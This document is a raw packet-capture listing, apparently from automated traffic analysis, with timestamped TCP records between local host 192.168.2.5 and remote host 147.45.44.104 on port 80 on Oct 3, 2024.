                                                                                                                                Oct 3, 2024 15:07:08.250654936 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.250663996 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250679016 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250691891 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250713110 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250727892 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250740051 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.250742912 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250766993 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250775099 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.250782967 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250797033 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250797033 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.250837088 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.250859022 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250874043 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250888109 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250901937 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250905037 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.250943899 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.250977993 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.250992060 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251005888 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251023054 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251024961 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251116991 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251163006 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251221895 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251224995 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251251936 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251290083 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251291990 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251317978 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251346111 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251358986 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251372099 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251414061 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251421928 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251451015 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251476049 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251516104 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251529932 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251549006 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251565933 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251694918 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251708984 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251719952 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251729012 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251740932 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251743078 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251751900 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251763105 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251771927 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251776934 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251810074 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251831055 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251872063 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251873970 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251898050 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251920938 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.251939058 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.251945972 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252003908 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252033949 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252039909 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252052069 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252062082 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252073050 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252083063 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252084970 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252094030 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252104044 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252109051 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252115965 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252125978 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252136946 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252151966 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252151966 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252163887 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252173901 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252181053 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252185106 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252202034 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252202034 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252213001 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252223015 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252227068 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252233982 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252244949 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252254009 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252255917 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252264977 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252274990 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252281904 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252291918 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252302885 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252312899 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252314091 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252322912 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252331972 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252337933 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252343893 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252353907 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252365112 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252377987 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252415895 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252439022 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252450943 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252477884 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252485037 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252490997 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252506971 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252516985 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252521992 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252522945 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252527952 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252545118 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252553940 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252559900 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252563953 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252569914 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252578020 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252603054 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252614021 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252630949 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252645016 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252679110 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252681971 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252691031 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252702951 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252712965 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.252721071 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.252897978 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.255758047 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.336771011 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.336783886 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.336793900 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.336833000 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.336843014 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.336853027 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.336858988 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.336863041 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.336901903 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.337289095 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337301016 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337310076 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337320089 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337330103 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337336063 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.337340117 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337352037 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337361097 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337373018 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.337395906 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.337877035 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337904930 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337913990 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337924957 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.337954044 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337955952 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.337965012 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337975979 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.337991953 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338001966 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338005066 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338032007 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338125944 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338138103 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338170052 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338185072 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338196993 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338206053 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338227987 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338236094 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338244915 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338247061 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338263988 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338274002 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338299990 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338325977 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338327885 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338336945 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338363886 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338372946 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338378906 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338382959 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338393927 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338407040 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338440895 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338557959 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338568926 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338578939 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338588953 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338602066 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338624954 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338634968 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338691950 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338701963 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338711977 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338721037 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338735104 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338749886 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338814974 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338825941 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338835001 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338845015 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338856936 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338862896 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338869095 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338880062 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338886976 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338890076 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338901997 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338910103 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338929892 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338931084 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338948011 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338958025 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338987112 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.338989019 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.338999987 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339015961 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339025974 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339039087 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339066029 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339140892 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339150906 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339159966 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339170933 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339180946 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339190960 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339199066 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339215994 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339231968 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339242935 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339242935 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339255095 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339266062 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339277029 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339286089 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339308023 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339368105 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339378119 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339391947 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339401960 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339411020 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339417934 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339426041 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339432955 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339467049 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339548111 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339559078 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339569092 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339587927 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339617014 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339624882 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339673996 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339715958 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339782953 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339792967 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339802027 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339818001 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339827061 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339833975 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339838028 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339854002 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339860916 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339865923 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.339894056 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339915037 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.339998960 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340050936 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340065956 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340073109 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340086937 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340101004 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340112925 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.340126038 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340145111 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.340147018 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340164900 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340184927 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340195894 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.340199947 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340214014 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340225935 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.340229034 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340243101 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340250015 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340256929 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340260029 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.340270996 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340285063 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340301037 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340301037 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.340326071 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340329885 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.340339899 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340359926 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340369940 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.340374947 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340389013 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340401888 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:08.340403080 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340418100 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:08.340426922 CEST4970480192.168.2.5147.45.44.104
